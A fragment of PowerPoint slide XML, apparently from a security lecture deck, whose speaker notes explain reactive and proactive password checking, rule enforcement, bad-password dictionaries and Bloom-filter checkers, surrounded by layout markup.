              <a:t>algorithm generates words by forming pronounceable syllables and concatenating</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>them to form a word. A random number generator produces a random stream of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>characters used to construct the syllables and words.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A reactive password checking  strategy is one in which the system periodically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>runs its own password cracker to find guessable passwords. The system cancels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>any passwords that are guessed and notifies the user. This tactic has a number of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>drawbacks. First, it is resource intensive if the job is done right. Because a determined</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>opponent who is able to steal a password file can devote full CPU time to the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>task for hours or even days, an effective reactive password checker is at a distinct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>disadvantage. Furthermore, any existing passwords remain vulnerable until the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>reactive password checker finds them.</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The most promising approach to improved password security is a proactive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>password checker . In this scheme, a user is allowed to select his or her own password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>However, at the time of selection, the system checks to see if the password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>is allowable and, if not, rejects it. Such checkers are based on the philosophy that,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>with sufficient guidance from the system, users can select memorable passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>from a fairly large password space that are not likely to be guessed in a dictionary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>attack.</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The trick with a proactive password checker is to strike a balance between</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>user acceptability and strength. If the system rejects too many passwords, users will</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>complain that it is too hard to select a password. If the system uses some simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>algorithm to define what is acceptable, this provides guidance to password crackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> to refine their guessing technique. In the remainder of this subsection, we look at</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>possible approaches to proactive password checking.</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The first approach is a simple system for rule enforcement. For example, the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>following rules could be enforced:</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All passwords must be at least eight characters long.</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In the first eight characters, the passwords must include at least one each of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>uppercase, lowercase, numeric digits, and punctuation marks.</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These rules could be coupled with advice to the user. Although this approach is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>superior to simply educating users, it may not be sufficient to thwart password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>crackers. This scheme alerts crackers as to which passwords not  to try but may still</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>make it possible to do password cracking.</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Another possible procedure is simply to compile a large dictionary of possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>“bad” passwords. When a user selects a password, the system checks to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>make sure that it is not on the disapproved list. There are two problems with this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>approach:</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Space:  The dictionary must be very large to be effective. For example, the dictionary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>used in the Purdue study [SPAF92a] occupies more than 30 megabytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>of storage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>• Time:  The time required to search a large dictionary may itself be large. In</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>addition, to check for likely permutations of dictionary words, either those</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>words most be included in the dictionary, making it truly huge, or each search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>must also involve considerable processing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34"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Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA6FF5B9-07C7-4EF9-9C8B-796AE91D5551}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251907" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7D92324-503C-4DDC-B8F2-86A2494C6FA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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>A technique [SPAF92a, SPAF92b] for developing an effective and efficient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>proactive password checker that is based on rejecting words on a list has been</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>implemented on a number of systems, including Linux. It is based on the use of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>a Bloom filter [BLOO70].</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251908" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14DEE388-7BB4-4863-9D93-4B8A1B610D9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54B0D36-0395-4D5F-9196-313AD54AA690}" type="slidenum">
              <a:rPr lang="en-AU" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>195</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="120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8A23786A-63CD-4E12-BD63-4DC296C7ABFB}"/>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80F1082E-7420-4409-B24D-F067D336BE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4" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C376DB6-9E01-4922-BEB6-A378143539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B738B4C7-6972-42B1-B981-2ADA910C370D}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">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059602DB-E040-4742-B849-441100C8048D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9B208F5-270F-405F-8CAA-367B006597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412" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{455C6D6E-D6C0-4620-AF75-0BF355754E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37632D91-0458-455B-9311-2F331ABFD65B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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BA50403C-F7F2-40D2-8BD6-95D38198B385}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DBE1CB6-70E4-4108-80C2-F03D553D39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60" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0589401C-DB21-4C86-83F3-AC6876D8E7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21ED7378-47EB-4D0D-9BB2-3125A8B38D61}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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99F4DFE6-545A-4244-95B5-5A4BBDAE273A}"/>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897F9302-3487-4D0C-99FD-C94E15E552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508" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0882347-3C8D-48A5-9901-4D904312A0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fld id="{D2B8C2C3-5754-4475-9A6F-47CA5D3B2396}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC0C35B6-FEFF-41C0-BF4E-CE8E19A598BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2438400"/>
            <a:ext cx="9009063" cy="1052513"/>
            <a:chOff x="0" y="1536"/>
            <a:chExt cx="5675" cy="663"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 1027">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1E9313E-3F80-40B4-B609-FBED046B897A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="185" y="1604"/>
              <a:ext cx="449" cy="299"/>
              <a:chOff x="720" y="336"/>
              <a:chExt cx="624" cy="432"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Rectangle 1028">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{609C88BF-4081-4D96-8A90-64F8AF205C42}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="720" y="336"/>
                <a:ext cx="384" cy="432"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="folHlink"/>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Rectangle 1029">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8294E2E-4329-4A78-B743-8BD6CEEB538F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 1030">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{458A87D2-1718-42B6-8179-89D7D2D7F49B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="263" y="1870"/>
              <a:ext cx="466" cy="299"/>
              <a:chOff x="912" y="2640"/>
              <a:chExt cx="672" cy="432"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Rectangle 1031">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5101347D-F1FB-4397-B2CD-1D8B359ECAE8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="912" y="2640"/>
                <a:ext cx="384" cy="432"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent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Rectangle 1032">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D174121-7160-4F60-8291-ED35E1843200}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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7" name="Rectangle 1033">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16A211D5-110E-4621-AEAE-42AB390E24C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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Rectangle 1034">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{752EF219-E344-4F25-B1FA-F78EEB7F6824}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="400" y="1536"/>
              <a:ext cx="20" cy="663"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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Rectangle 1035">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B02FDD47-B08E-4197-9B3A-B0469904D58D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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249868" name="Rectangle 1036"/>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249869" name="Rectangle 1037"/>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038">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{433CC8E9-593B-41E5-8F9A-A9C559D05EF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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039">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5B5A603-39D9-4551-B81D-1BCCFDF26447}"/>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040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BD6F3AE-1F94-4AD1-9DDD-A5A4E5D65878}"/>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869C65D2-0624-4619-876D-E4474D6F493F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4087419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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2930EAE2-C6CC-48C8-A6D3-0F57AD0E707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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CEDAA08-EA87-4190-AE3D-51A60464A7C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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F8B479D-F451-4B34-BA58-D57C62FBCB9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{874E2216-F5E0-4B8A-83C6-BB171CD61B6F}" type="slidenum">
